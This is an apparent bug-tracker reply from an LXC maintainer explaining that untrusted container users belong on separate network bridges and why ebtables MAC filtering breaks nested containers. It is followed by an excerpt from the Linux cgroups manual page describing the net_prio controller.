Stéphane Graber (stgraber) wrote on 2016-02-22:	#1
Hi,

Thanks for the report. This is not exactly news to us and has been
mentioned publicly a few times.

Our usual answer to this is that if you don't trust your users, you
shouldn't grant them access to a shared bridge, instead setup a
separate bridge for them.

MAC filtering through ebtables is an option but the problem with this
approach is that it essentially prevents container nesting as that
would lead to more than one MAC being used by the container which
ebtables would block.

[...]

On a local system, our answer to that is as I said to either trust
everyone you give access to a shared bridge or to segment traffic by
using multiple bridges.

man 7 cgroups

   Cgroups version 1 controllers
	Each of the  cgroups version 1 controllers is  governed by a
	kernel configuration  option (listed  below).  Additionally,
	the availability of  the cgroups feature is  governed by the
	CONFIG_CGROUPS kernel configuration option.
[...]

	net_prio (since Linux 3.3; CONFIG_CGROUP_NET_PRIO)
		This  allows priorities  to be  specified, per  network
		interface, for cgroups.

		Further information  can be found in  the kernel source
		file Documentation/cgroup-v1/net_prio.txt.